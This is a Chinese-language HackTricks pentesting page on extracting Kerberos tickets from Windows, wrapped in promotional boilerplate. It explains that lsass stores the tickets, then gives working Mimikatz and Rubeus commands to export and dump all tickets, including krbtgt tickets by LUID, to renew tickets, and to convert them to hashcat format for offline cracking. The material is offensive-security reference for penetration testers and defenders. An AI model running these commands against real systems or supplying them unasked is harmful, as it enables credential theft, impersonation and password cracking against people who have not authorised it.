hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

从Windows中获取票据

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式：

• 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
• 获取官方PEASS & HackTricks周边产品
• 发现PEASS家族，我们的独家NFTs收藏品
• 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
• 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

Windows中的票据由lsass（本地安全性机构子系统服务）进程管理和存储，负责处理安全策略。要提取这些票据，需要与lsass进程进行交互。非管理员用户只能访问自己的票据，而管理员有权限提取系统上的所有票据。为此，通常使用Mimikatz和Rubeus工具，它们提供不同的命令和功能。

Mimikatz

Mimikatz是一个多功能工具，可以与Windows安全进行交互。它不仅用于提取票据，还用于各种其他与安全相关的操作。

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus是一款专门针对Kerberos交互和操作的工具。它用于票据提取和处理，以及其他与Kerberos相关的活动。

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

在使用这些命令时，请确保将 <BASE64_TICKET> 和 <luid> 等占位符替换为实际的 Base64 编码票证和登录 ID。这些工具提供了广泛的功能，用于管理票证并与 Windows 的安全机制进行交互。

参考资料

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

从零开始学习 AWS 黑客技术，成为专家 htARTE（HackTricks AWS 红队专家）！

支持 HackTricks 的其他方式：

• 如果您想在 HackTricks 中看到您的 公司广告 或 下载 PDF 版本的 HackTricks，请查看 订阅计划!
• 获取 官方 PEASS & HackTricks 商品
• 探索 PEASS 家族，我们的独家 NFTs
• 加入 💬 Discord 群组 或 电报群组 或 关注 我们的 Twitter 🐦 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。